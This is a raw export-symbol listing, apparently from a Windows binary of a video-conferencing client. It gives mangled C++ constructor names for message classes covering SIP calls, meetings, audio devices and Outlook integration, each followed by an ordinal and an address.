              ??0CPU@Cmm@@QAE@$$QAV01@@Z2960x44bd40
              ??0CPU@Cmm@@QAE@ABV01@@Z2970x44bcf0
              ??0CPU@Cmm@@QAE@XZ2980x45f270
              ??0CRefThread@Cmm@@QAE@XZ2990x4173b0
              ??0CSBMBMessage_AddClientLog@@QAE@XZ3000x4197e0
              ??0CSBMBMessage_AddToCameraControlGroup@@QAE@XZ3010x427840
              ??0CSBMBMessage_AppSupportNewWhiteBoardSetting@@QAE@XZ3020x427150
              ??0CSBMBMessage_Assisant_Keybase@@QAE@XZ3030x424600
              ??0CSBMBMessage_Assistant_Audio_Configure_Request@@QAE@XZ3040x41c9b0
              ??0CSBMBMessage_Assistant_Audio_Configure_Response@@QAE@XZ3050x41cb90
              ??0CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAE@XZ3060x41fa40
              ??0CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAE@XZ3070x41fb60
              ??0CSBMBMessage_Assistant_Broadcast_Clear_All_Audio_From_Txchannel_Response@@QAE@XZ3080x41fea0
              ??0CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@QAE@XZ3090x41f860
              ??0CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Response@@QAE@XZ3100x41f980
              ??0CSBMBMessage_Assistant_Broadcast_Network_Audio_Stop_Proxy_Response@@QAE@XZ3110x41f9e0
              ??0CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAE@XZ3120x41fc80
              ??0CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAE@XZ3130x41fd80
              ??0CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@QAE@XZ3140x41ff00
              ??0CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@QAE@XZ3150x41ff60
              ??0CSBMBMessage_Assistant_CEC_LoadResponse@@QAE@XZ3160x41e060
              ??0CSBMBMessage_Assistant_CEC_PowerOnResponse@@QAE@XZ3170x41e120
              ??0CSBMBMessage_Assistant_CEC_StandByResponse@@QAE@XZ3180x41e180
              ??0CSBMBMessage_Assistant_CEC_UnloadResponse@@QAE@XZ3190x41e0c0
              ??0CSBMBMessage_Assistant_ControlSystem_CallDeviceSucceedNotify@@QAE@XZ3200x41e550
              ??0CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@QAE@XZ3210x41e430
              ??0CSBMBMessage_Assistant_ControlSystem_DevicesUpdatedNotify@@QAE@XZ3220x41e490
              ??0CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAE@XZ3230x41e2a0
              ??0CSBMBMessage_Assistant_ControlSystem_ExecuteRuleRequest@@QAE@XZ3240x41e240
              ??0CSBMBMessage_Assistant_ControlSystem_ExecuteSceneRequest@@QAE@XZ3250x41e3d0
              ??0CSBMBMessage_Assistant_ControlSystem_LoadRequest@@QAE@XZ3260x41e1e0
              ??0CSBMBMessage_Assistant_ControlSystem_ScenesPreparedNotify@@QAE@XZ3270x41e4f0
              ??0CSBMBMessage_Assistant_DAL_Service_Conf_Render_Change@@QAE@XZ3280x41ef10
              ??0CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@QAE@XZ3290x41e910
              ??0CSBMBMessage_Assistant_DAL_Service_Identify_Device_Request@@QAE@XZ3300x41ed40
              ??0CSBMBMessage_Assistant_DAL_Service_Identify_Device_Response@@QAE@XZ3310x41eda0
              ??0CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAE@XZ3320x41e6d0
              ??0CSBMBMessage_Assistant_DAL_Service_Load_Service_Response@@QAE@XZ3330x41e7f0
              ??0CSBMBMessage_Assistant_DAL_Service_Network_Device_Added_Notification@@QAE@XZ3340x41f470
              ??0CSBMBMessage_Assistant_DAL_Service_Network_Device_List_Refresh_Notification@@QAE@XZ3350x41f350
              ??0CSBMBMessage_Assistant_DAL_Service_Network_Device_Removed_Notification@@QAE@XZ3360x41f4d0
              ??0CSBMBMessage_Assistant_DAL_Service_Network_Device_Update_Notification@@QAE@XZ3370x41f530
              ??0CSBMBMessage_Assistant_DAL_Service_Service_Components_Change_Notification@@QAE@XZ3380x41f590
              ??0CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAE@XZ3390x41f180
              ??0CSBMBMessage_Assistant_DAL_Service_Service_Refresh_Device_List_Request@@QAE@XZ3400x41eeb0
              ??0CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@QAE@XZ3410x41e970
              ??0CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@QAE@XZ3420x41ea90
              ??0CSBMBMessage_Assistant_DAL_Service_Sip_Audio_Render_Change_Notification@@QAE@XZ3430x41f600
              ??0CSBMBMessage_Assistant_DAL_Service_Sip_Render_Change@@QAE@XZ3440x41ef80
              ??0CSBMBMessage_Assistant_DAL_Service_Unload_Service_Request@@QAE@XZ3450x41e850
              ??0CSBMBMessage_Assistant_DAL_Service_Unload_Service_Response@@QAE@XZ3460x41e8b0
              ??0CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Request@@QAE@XZ3470x41eb00
              ??0CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Response@@QAE@XZ3480x41ec20
              ??0CSBMBMessage_Assistant_DAL_Service_Use_Dante_Controller@@QAE@XZ3490x41f080
              ??0CSBMBMessage_Assistant_Exit_Process@@QAE@XZ3500x41c890
              ??0CSBMBMessage_Assistant_LineCallMergedNotification@@QAE@XZ3510x41de90
              ??0CSBMBMessage_Assistant_SIP_AudioDeviceFailNotification@@QAE@XZ3520x41cec0
              ??0CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@QAE@XZ3530x41dcd0
              ??0CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@QAE@XZ3540x41cda0
              ??0CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@QAE@XZ3550x41d140
              ??0CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@QAE@XZ3560x41d250
              ??0CSBMBMessage_Assistant_SIP_CheckNomadic911Request@@QAE@XZ3570x41e000
              ??0CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAE@XZ3580x41d8a0
              ??0CSBMBMessage_Assistant_SIP_LineCallTerminatedNotification@@QAE@XZ3590x41de30
              ??0CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAE@XZ3600x41db20
              ??0CSBMBMessage_Assistant_SIP_MergeCallResponse@@QAE@XZ3610x41da00
              ??0CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAE@XZ3620x41cfe0
              ??0CSBMBMessage_Assistant_SIP_MessageUploadMemLog@@QAE@XZ3630x41d0e0
              ??0CSBMBMessage_Assistant_SIP_OnCallIncomingNotification@@QAE@XZ3640x41d6c0
              ??0CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@QAE@XZ3650x41d430
              ??0CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@QAE@XZ3660x41d4a0
              ??0CSBMBMessage_Assistant_SIP_OnCallRecordingStatusUpdateNotification@@QAE@XZ3670x41d5c0
              ??0CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAE@XZ3680x41d2c0
              ??0CSBMBMessage_Assistant_SIP_OnCallTransferResultNotification@@QAE@XZ3690x41cf20
              ??0CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAE@XZ3700x41cbf0
              ??0CSBMBMessage_Assistant_SIP_OnSIPServiceStatusChangedNotification@@QAE@XZ3710x41d720
              ??0CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@QAE@XZ3720x41dd30
              ??0CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAE@XZ3730x41db90
              ??0CSBMBMessage_Assistant_SIP_SuspendToResume@@QAE@XZ3740x41cd40
              ??0CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@QAE@XZ3750x41def0
              ??0CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@QAE@XZ3760x41d780
              ??0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Create_Request@@QAE@XZ3770x420300
              ??0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Created_Notification@@QAE@XZ3780x420470
              ??0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Destroy_Request@@QAE@XZ3790x420410
              ??0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Error_Notification@@QAE@XZ3800x4204d0
              ??0CSBMBMessage_Assistant_SIP_Virtual_Speaker_Create_Request@@QAE@XZ3810x420530
              ??0CSBMBMessage_Assistant_SIP_Virtual_Speaker_Destroy_Request@@QAE@XZ3820x420590
              ??0CSBMBMessage_Assistant_SIP_WMIActive@@QAE@XZ3830x41cf80
              ??0CSBMBMessage_Assistant_Virtual_Audio_Register_Capturer_Proxy_Response@@QAE@XZ3840x41f720
              ??0CSBMBMessage_Assistant_Virtual_Audio_Start_Capture_Response@@QAE@XZ3850x41f660
              ??0CSBMBMessage_Assistant_Virtual_Audio_Stop_Capture_Response@@QAE@XZ3860x41f6c0
              ??0CSBMBMessage_Assistant_Voice_Command_Action_Request@@QAE@XZ3870x424530
              ??0CSBMBMessage_Assistant_Voice_Command_Data_Request@@QAE@XZ3880x424300
              ??0CSBMBMessage_Assistant_Voice_Command_Data_Response@@QAE@XZ3890x424360
              ??0CSBMBMessage_Assistant_Voice_Command_Start_Request@@QAE@XZ3900x424200
              ??0CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAE@XZ3910x424590
              ??0CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAE@XZ3920x4243c0
              ??0CSBMBMessage_Audio3rdSDK_AudioCmdNotify@@QAE@XZ3930x4215e0
              ??0CSBMBMessage_Audio3rdSDK_AudioCmdRequest@@QAE@XZ3940x421580
              ??0CSBMBMessage_AudioFacilityStatus@@QAE@XZ3950x420c60
              ??0CSBMBMessage_AvatarDataRequest@@QAE@XZ3960x427b40
              ??0CSBMBMessage_AvatarDataResponse@@QAE@XZ3970x427ba0
              ??0CSBMBMessage_CCIScreenRecordingNotify@@QAE@XZ3980x4230a0
              ??0CSBMBMessage_CCIScreenRecordingRequest@@QAE@XZ3990x423020
              ??0CSBMBMessage_CCIVideoAssignAndNotify@@QAE@XZ4000x423a20
              ??0CSBMBMessage_CCIVideoAudioChangeNotify@@QAE@XZ4010x422ab0
              ??0CSBMBMessage_CCIVideoCancelInviteByPhoneRequest@@QAE@XZ4020x422870
              ??0CSBMBMessage_CCIVideoChangeBtnStatusRequest@@QAE@XZ4030x422f60
              ??0CSBMBMessage_CCIVideoChangeHostRequest@@QAE@XZ4040x4238a0
              ??0CSBMBMessage_CCIVideoChangeRecordStatusRequest@@QAE@XZ4050x422fc0
              ??0CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@QAE@XZ4060x4235b0
              ??0CSBMBMessage_CCIVideoCreateEmbedWindowRequest@@QAE@XZ4070x4231c0
              ??0CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@QAE@XZ4080x423620
              ??0CSBMBMessage_CCIVideoDestroyEmbedWindowRequest@@QAE@XZ4090x423350
              ??0CSBMBMessage_CCIVideoEmbedWindowSendMsgRequest@@QAE@XZ4100x4233b0
              ??0CSBMBMessage_CCIVideoEndDropDownClickBtnNotify@@QAE@XZ4110x423840
              ??0CSBMBMessage_CCIVideoEndDropdownButtonClickConfirmRequest@@QAE@XZ4120x4234f0
              ??0CSBMBMessage_CCIVideoEndVideoNotify@@QAE@XZ4130x4220c0
              ??0CSBMBMessage_CCIVideoEndVideoRequest@@QAE@XZ4140x422320
              ??0CSBMBMessage_CCIVideoEventReportNotify@@QAE@XZ4150x423ae0
              ??0CSBMBMessage_CCIVideoGetCurrentUserRequest@@QAE@XZ4160x422380
              ??0CSBMBMessage_CCIVideoGetCurrentUserResponse@@QAE@XZ4170x4223e0
              ??0CSBMBMessage_CCIVideoGetSupportCountryInfoRequest@@QAE@XZ4180x4228d0
              ??0CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@QAE@XZ4190x422930
              ??0CSBMBMessage_CCIVideoGetUserListRequest@@QAE@XZ4200x422440
              ??0CSBMBMessage_CCIVideoGetUserListResponse@@QAE@XZ4210x4224a0
              ??0CSBMBMessage_CCIVideoHoldStatusChangeNotify@@QAE@XZ4220x423900
              ??0CSBMBMessage_CCIVideoHostChangeNotify@@QAE@XZ4230x423a80
              ??0CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAE@XZ4240x4227a0
              ??0CSBMBMessage_CCIVideoInviteByPhoneStatusNotify@@QAE@XZ4250x422810
              ??0CSBMBMessage_CCIVideoJoinMeetingRequest@@QAE@XZ4260x421f10
              ??0CSBMBMessage_CCIVideoJoinMeetingResponse@@QAE@XZ4270x421f70
              ??0CSBMBMessage_CCIVideoMuteAudioRequest@@QAE@XZ4280x422560
              ??0CSBMBMessage_CCIVideoOnClosedCaptionChanged@@QAE@XZ4290x423b40
              ??0CSBMBMessage_CCIVideoOnEmbedWindowSendMsgRequest@@QAE@XZ4300x423700
              ??0CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAE@XZ4310x422dc0
              ??0CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAE@XZ4320x422ca0
              ??0CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAE@XZ4330x422b70
              ??0CSBMBMessage_CCIVideoOnLiveTranscriptionStatusNotify@@QAE@XZ4340x422b10
              ??0CSBMBMessage_CCIVideoOnUserJoinNotify@@QAE@XZ4350x422680
              ??0CSBMBMessage_CCIVideoOnUserLeaveNotify@@QAE@XZ4360x4226e0
              ??0CSBMBMessage_CCIVideoOnUserUpdatedNotify@@QAE@XZ4370x422740
              ??0CSBMBMessage_CCIVideoOpenURLWithDefaultBrowser@@QAE@XZ4380x423780
              ??0CSBMBMessage_CCIVideoPTQuitNotify@@QAE@XZ4390x423c40
              ??0CSBMBMessage_CCIVideoReceiveCommandNotify@@QAE@XZ4400x423d00
              ??0CSBMBMessage_CCIVideoRecordingStateChangeNotify@@QAE@XZ4410x422130
              ??0CSBMBMessage_CCIVideoRemoveUserRequest@@QAE@XZ4420x422500
              ??0CSBMBMessage_CCIVideoSendCommandRequest@@QAE@XZ4430x423ca0
              ??0CSBMBMessage_CCIVideoSetDomainRequest@@QAE@XZ4440x422990
              ??0CSBMBMessage_CCIVideoSetEndButtonDropdowRequest@@QAE@XZ4450x423490
              ??0CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAE@XZ4460x423430
              ??0CSBMBMessage_CCIVideoSetFullScreenRequest@@QAE@XZ4470x423550
              ??0CSBMBMessage_CCIVideoSetVBRequest@@QAE@XZ4480x4229f0
              ??0CSBMBMessage_CCIVideoSettingsSyncFromPTRequest@@QAE@XZ4490x4222b0
              ??0CSBMBMessage_CCIVideoSettingsSyncToPTRequest@@QAE@XZ4500x422190
              ??0CSBMBMessage_CCIVideoShowEmbedWindowNotify@@QAE@XZ4510x423690
              ??0CSBMBMessage_CCIVideoShowEmbedWindowRequest@@QAE@XZ4520x4232e0
              ??0CSBMBMessage_CCIVideoUseAudioRequest@@QAE@XZ4530x422a50
              ??0CSBMBMessage_CCIVideoUserDataUpdateNotify@@QAE@XZ4540x4237e0
              ??0CSBMBMessage_CCIVideoWarmTransferNotify@@QAE@XZ4550x4239c0
              ??0CSBMBMessage_CCIVideoWarmTransferRequest@@QAE@XZ4560x423960
              ??0CSBMBMessage_CDNEventIndication@@QAE@XZ4570x4264c0
              ??0CSBMBMessage_CameraControlGroupAdded@@QAE@XZ4580x427960
              ??0CSBMBMessage_CameraControlGroupFetched@@QAE@XZ4590x427900
              ??0CSBMBMessage_CameraControlGroupRemoved@@QAE@XZ4600x4279c0
              ??0CSBMBMessage_CancelDownloadComponent@@QAE@XZ4610x426e70
              ??0CSBMBMessage_ChatWithBuddy@@QAE@XZ4620x424660
              ??0CSBMBMessage_CheckInSessionReq@@QAE@XZ4630x425cf0
              ??0CSBMBMessage_CheckInSessionRsp@@QAE@XZ4640x425e10
              ??0CSBMBMessage_CheckNomadic911_Notification@@QAE@XZ4650x420780
              ??0CSBMBMessage_Client3rdSDK_SDKCmdNotify@@QAE@XZ4660x4216a0
              ??0CSBMBMessage_Client3rdSDK_SDKCmdRequest@@QAE@XZ4670x421640
              ??0CSBMBMessage_CompanionTokenRequest@@QAE@XZ4680x425770
              ??0CSBMBMessage_CompanionTokenResponse@@QAE@XZ4690x4257e0
              ??0CSBMBMessage_ComponentDownloadResult@@QAE@XZ4700x426f30
              ??0CSBMBMessage_ConfGetZRMeetingInfoReq@@QAE@XZ4710x425420
              ??0CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterRequest@@QAE@XZ4720x41c5f0
              ??0CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAE@XZ4730x41c650
              ??0CSBMBMessage_ConfInterProcessAudioSharingServiceUnregisterResponse@@QAE@XZ4740x41c7d0
              ??0CSBMBMessage_ConfirmConfLeave@@QAE@XZ4750x4199c0
              ??0CSBMBMessage_ConfirmRecaptcha@@QAE@XZ4760x41ba30
              ??0CSBMBMessage_Doc2ImgCancelConvertRequest@@QAE@XZ4770x4214c0
              ??0CSBMBMessage_Doc2ImgCancelConvertResponse@@QAE@XZ4780x421520
              ??0CSBMBMessage_Doc2ImgConvertFinish@@QAE@XZ4790x4213b0
              ??0CSBMBMessage_Doc2ImgConvertProgress@@QAE@XZ4800x421210
              ??0CSBMBMessage_Doc2ImgStartConvertRequest@@QAE@XZ4810x420fd0
              ??0CSBMBMessage_Doc2ImgStartConvertResponse@@QAE@XZ4820x4210f0
              ??0CSBMBMessage_DocsShareStartMeetingCollaboratorsInviteInfo@@QAE@XZ4830x427cc0
              ??0CSBMBMessage_ECDNInfo@@QAE@XZ4840x424b50
              ??0CSBMBMessage_ECDNSetBackupSuperNodeInfo@@QAE@XZ4850x424c10
              ??0CSBMBMessage_ECDNUpdateSuperNodeMaxLoad@@QAE@XZ4860x424bb0
              ??0CSBMBMessage_EnableQualtricsFeedback@@QAE@XZ4870x427470
              ??0CSBMBMessage_EnableSubscribePresence@@QAE@XZ4880x424d30
              ??0CSBMBMessage_GetPresence@@QAE@XZ4890x424a30
              ??0CSBMBMessage_GetPresenceResponse@@QAE@XZ4900x424a90
              ??0CSBMBMessage_HeartBeatRequest@@QAE@XZ4910x420060
              ??0CSBMBMessage_HuddlesOnShowAvatarStateChange@@QAE@XZ4920x427d80
              ??0CSBMBMessage_IGotIt@@QAE@XZ4930x417da0
              ??0CSBMBMessage_IPCSDK_SDKCmdNotify@@QAE@XZ4940x421770
              ??0CSBMBMessage_IPCSDK_SDKCmdRequest@@QAE@XZ4950x421700
              ??0CSBMBMessage_InitThread@@QAE@XZ4960x4177d0
              ??0CSBMBMessage_InitUserPolicySettings@@QAE@XZ4970x41c1c0
              ??0CSBMBMessage_InviteBuddyToMeeting@@QAE@XZ4980x424900
              ??0CSBMBMessage_InviteRoomSystemResult@@QAE@XZ4990x419160
              ??0CSBMBMessage_InviteWinStatus@@QAE@XZ5000x419010
              ??0CSBMBMessage_InviteZoomPhoneTokenRequest@@QAE@XZ5010x425540
              ??0CSBMBMessage_InviteZoomPhoneTokenResponse@@QAE@XZ5020x4255a0
              ??0CSBMBMessage_InviteeCredRequest@@QAE@XZ5030x423ef0
              ??0CSBMBMessage_InviteeCredResponse@@QAE@XZ5040x423f50
              ??0CSBMBMessage_InviteeIakRequest@@QAE@XZ5050x423e90
              ??0CSBMBMessage_InviteeIakResponse@@QAE@XZ5060x424060
              ??0CSBMBMessage_JoinCompliantMeetingAutoCall@@QAE@XZ5070x426b80
              ??0CSBMBMessage_KeepAlive@@QAE@XZ5080x4196d0
              ??0CSBMBMessage_LCPRecordOperate@@QAE@XZ5090x424180
              ??0CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAE@XZ5100x420960
              ??0CSBMBMessage_LeaveConfErrorDesc@@QAE@XZ5110x419de0
              ??0CSBMBMessage_LogService_StartChannel@@QAE@XZ5120x4207e0
              ??0CSBMBMessage_LogService_StopChannel@@QAE@XZ5130x420840
              ??0CSBMBMessage_LogService_SubChannelAdd@@QAE@XZ5140x4208a0
              ??0CSBMBMessage_LogService_SubChannelRemove@@QAE@XZ5150x420900
              ??0CSBMBMessage_MakeCallLogInfo@@QAE@XZ5160x424d90
              ??0CSBMBMessage_MediaAPIRequest@@QAE@XZ5170x41c350
              ??0CSBMBMessage_MediaAPIResponse@@QAE@XZ5180x41c470
              ??0CSBMBMessage_MeetingCacheBytesKVOperate@@QAE@XZ5190x41ca70
              ??0CSBMBMessage_MeetingDiagInfo@@QAE@XZ5200x427780
              ??0CSBMBMessage_MeetingPAAPToggleEvent@@QAE@XZ5210x424720
              ??0CSBMBMessage_MeetingWallpaperStartDownload@@QAE@XZ5220x4274d0
              ??0CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAE@XZ5230x4275f0
              ??0CSBMBMessage_MeshNotification@@QAE@XZ5240x424c70
              ??0CSBMBMessage_MyMeetingStatus@@QAE@XZ5250x424120
              ??0CSBMBMessage_NotifyActivateConf@@QAE@XZ5260x419610
              ??0CSBMBMessage_NotifyAfterInit@@QAE@XZ5270x417950
              ??0CSBMBMessage_NotifyAfterObjCreated@@QAE@XZ5280x4179b0
              ??0CSBMBMessage_NotifyAppActive@@QAE@XZ5290x417ad0
              ??0CSBMBMessage_NotifyAppEvent@@QAE@XZ5300x417cb0
              ??0CSBMBMessage_NotifyAppInActive@@QAE@XZ5310x417b30
              ??0CSBMBMessage_NotifyAssistantStart@@QAE@XZ5320x41c8f0
              ??0CSBMBMessage_NotifyAssistantStop@@QAE@XZ5330x41c950
              ??0CSBMBMessage_NotifyBandwidthLimitUpdate@@QAE@XZ5340x420180
              ??0CSBMBMessage_NotifyBeforeObjDestroyed@@QAE@XZ5350x417a70
              ??0CSBMBMessage_NotifyBeforeTerm@@QAE@XZ5360x417a10
              ??0CSBMBMessage_NotifyCallCommand@@QAE@XZ5370x418a10
              ??0CSBMBMessage_NotifyChangeBargeEmergencyCallStatus@@QAE@XZ5380x421840
              ??0CSBMBMessage_NotifyCheckUpdateResponse@@QAE@XZ5390x427030
              ??0CSBMBMessage_NotifyClaimHost@@QAE@XZ5400x41acf0
              ??0CSBMBMessage_NotifyClientRegistry@@QAE@XZ5410x417890
              ??0CSBMBMessage_NotifyClientUnRegistry@@QAE@XZ5420x4178f0
              ??0CSBMBMessage_NotifyConfPListChanged@@QAE@XZ5430x418b10
              ??0CSBMBMessage_NotifyConfSelected@@QAE@XZ5440x4195b0
              ??0CSBMBMessage_NotifyConfStart@@QAE@XZ5450x418310
              ??0CSBMBMessage_NotifyConfStop@@QAE@XZ5460x418450
              ??0CSBMBMessage_NotifyConfTokenResult@@QAE@XZ5470x424f30
              ??0CSBMBMessage_NotifyConfZRMeetingInfo@@QAE@XZ5480x4253b0
              ??0CSBMBMessage_NotifyConferenceStatus@@QAE@XZ5490x4186c0
              ??0CSBMBMessage_NotifyCustom3DAvatarFileIdUpdated@@QAE@XZ5500x41b7a0
              ??0CSBMBMessage_NotifyDeviceReady@@QAE@XZ5510x41a400
              ??0CSBMBMessage_NotifyDownloadProgress@@QAE@XZ5520x426ed0
              ??0CSBMBMessage_NotifyEndSetting@@QAE@XZ5530x418f10
              ??0CSBMBMessage_NotifyInvitationSent@@QAE@XZ5540x419960
              ??0CSBMBMessage_NotifyInviteFBBuddy@@QAE@XZ5550x418550
              ??0CSBMBMessage_NotifyJoinByMeetingNumber@@QAE@XZ5560x419550
              ??0CSBMBMessage_NotifyJoinFailForForceUpdate@@QAE@XZ5570x41abc0
              ??0CSBMBMessage_NotifyLeaveConf@@QAE@XZ5580x419670
              ??0CSBMBMessage_NotifyMeetingCallResponse@@QAE@XZ5590x426be0
              ??0CSBMBMessage_NotifyMeetingCustom3DAvatarElementThumbnailDownloaded@@QAE@XZ5600x41b370
              ??0CSBMBMessage_NotifyMeetingEmojiDownloadStatus@@QAE@XZ5610x41b920
              ??0CSBMBMessage_NotifyMeetingFaceMakeupDownloaded@@QAE@XZ5620x41b270
              ??0CSBMBMessage_NotifyMeetingImageDownloaded@@QAE@XZ5630x41b150
              ??0CSBMBMessage_NotifyMeetingParamChanged@@QAE@XZ5640x418040
              ??0CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAE@XZ5650x427660
              ??0CSBMBMessage_NotifyNetworkStateChanged@@QAE@XZ5660x417b90
              ??0CSBMBMessage_NotifyNetworkSwitch@@QAE@XZ5670x41c590
              ??0CSBMBMessage_NotifyOpenDialPad@@QAE@XZ5680x41e670
              ??0CSBMBMessage_NotifyOpenUrlWithAuth@@QAE@XZ5690x41ab60
              ??0CSBMBMessage_NotifyPTAddContact@@QAE@XZ5700x425350
              ??0CSBMBMessage_NotifyPTCallPeer@@QAE@XZ5710x425230
              ??0CSBMBMessage_NotifyPTCleanIDPToken@@QAE@XZ5720x425050
              ??0CSBMBMessage_NotifyPTDeviceInfo@@QAE@XZ5730x4250b0
              ??0CSBMBMessage_NotifyPTFeedbackInfo@@QAE@XZ5740x425120
              ??0CSBMBMessage_NotifyPTLoginInfo@@QAE@XZ5750x419f00
              ??0CSBMBMessage_NotifyReceivedSelectMe@@QAE@XZ5760x41a800
              ??0CSBMBMessage_NotifyRunningLate@@QAE@XZ5770x427d20
              ??0CSBMBMessage_NotifySaveChat@@QAE@XZ5780x41a9f0
              ??0CSBMBMessage_NotifySaveFileInMeetingChat@@QAE@XZ5790x4182b0
              ??0CSBMBMessage_NotifyShareFileInMeetingChat@@QAE@XZ5800x4180a0
              ??0CSBMBMessage_NotifyStartAppShare@@QAE@XZ5810x417ea0
              ??0CSBMBMessage_NotifyStartDocsShare@@QAE@XZ5820x427400
              ??0CSBMBMessage_NotifyStartLogin@@QAE@XZ5830x41a460
              ??0CSBMBMessage_NotifyStartRecording@@QAE@XZ5840x41a860
              ??0CSBMBMessage_NotifyStartSetting@@QAE@XZ5850x418df0
              ??0CSBMBMessage_NotifyStartWhiteboardShare@@QAE@XZ5860x4272f0
              ??0CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAE@XZ5870x418c90
              ??0CSBMBMessage_NotifyUpgradeAccount@@QAE@XZ5880x41ab00
              ??0CSBMBMessage_NotifyUserInputProxyAuth@@QAE@XZ5890x41a6b0
              ??0CSBMBMessage_NotifyUserPropertiesChanged@@QAE@XZ5900x4217e0
              ??0CSBMBMessage_NotifyVideoLayoutDownloadStatus@@QAE@XZ5910x41b810
              ??0CSBMBMessage_Notify_PT_Process_PID@@QAE@XZ5920x41c830
              ??0CSBMBMessage_Notify_ZPNS_MeetingStart@@QAE@XZ5930x4201e0
              ??0CSBMBMessage_OnZPFeatureNotification@@QAE@XZ5940x4240c0
              ??0CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAE@XZ5950x4192b0
              ??0CSBMBMessage_OpenLoginPanelForGuest@@QAE@XZ5960x4194f0
              ??0CSBMBMessage_OperateAudioFacilityParam@@QAE@XZ5970x420b40
              ??0CSBMBMessage_OperateChatFacilityParam@@QAE@XZ5980x420e40
              ??0CSBMBMessage_OperateScreenShareFacilityParam@@QAE@XZ5990x420dd0
              ??0CSBMBMessage_OperateVideoFacilityParam@@QAE@XZ6000x420cc0
              ??0CSBMBMessage_OutlookGetMAPICalendarEvents@@QAE@XZ6010x40c8d0
              ??0CSBMBMessage_OutlookMAPIEventChangeNotify@@QAE@XZ6020x40c7a0
              ??0CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAE@XZ6030x40c830
              ??0CSBMBMessage_OutlookOnGetMAPICalendarEventsNotify@@QAE@XZ6040x40c950
              ??0CSBMBMessage_OutlookRequest@@QAE@XZ6050x417500
              ??0CSBMBMessage_OutlookResponse@@QAE@XZ6060x417620
              ??0CSBMBMessage_OutlookStartMeetingRequest@@QAE@XZ6070x417680
              ??0CSBMBMessage_OutlookStartMeetingResponse@@QAE@XZ6080x417770
              ??0CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Request@@QAE@XZ6090x421b20
              ??0CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Response@@QAE@XZ6100x421b80
              ??0CSBMBMessage_Outlook_IMIntegration_PhotoChanged_Notification@@QAE@XZ6110x421e20
              ??0CSBMBMessage_Outlook_IMIntegration_SelfEmail_Response@@QAE@XZ6120x421dc0
              ??0CSBMBMessage_Outlook_IMIntegration_StartAudio_Request@@QAE@XZ6130x421d60
              ??0CSBMBMessage_Outlook_IMIntegration_StartChat_Request@@QAE@XZ6140x421d00
              ??0CSBMBMessage_Outlook_IMIntegration_StartVideo_Request@@QAE@XZ6150x421ca0
              ??0CSBMBMessage_PMCCheckInTeamChatReq@@QAE@XZ6160x425f20
              ??0CSBMBMessage_PMCCheckInTeamChatRsp@@QAE@XZ6170x425f80
              ??0CSBMBMessage_PMCMeetChatMsgDeepLinkReq@@QAE@XZ6180x4277e0
              ??0CSBMBMessage_PMCMeetChatMsgReaded@@QAE@XZ6190x4271b0
              ??0CSBMBMessage_PMCMeetingEnded@@QAE@XZ6200x426460
              ??0CSBMBMessage_PMCOpenTeamChatReq@@QAE@XZ6210x426150
              ??0CSBMBMessage_PMCOpenTeamChatRsp@@QAE@XZ6220x4263a0
              ??0CSBMBMessage_PMCQueryDefaultGiphyReq@@QAE@XZ6230x426090
              ??0CSBMBMessage_PMCQueryDefaultGiphyRsp@@QAE@XZ6240x4260f0
              ??0CSBMBMessage_PMCTeamChatUpdated@@QAE@XZ6250x426400
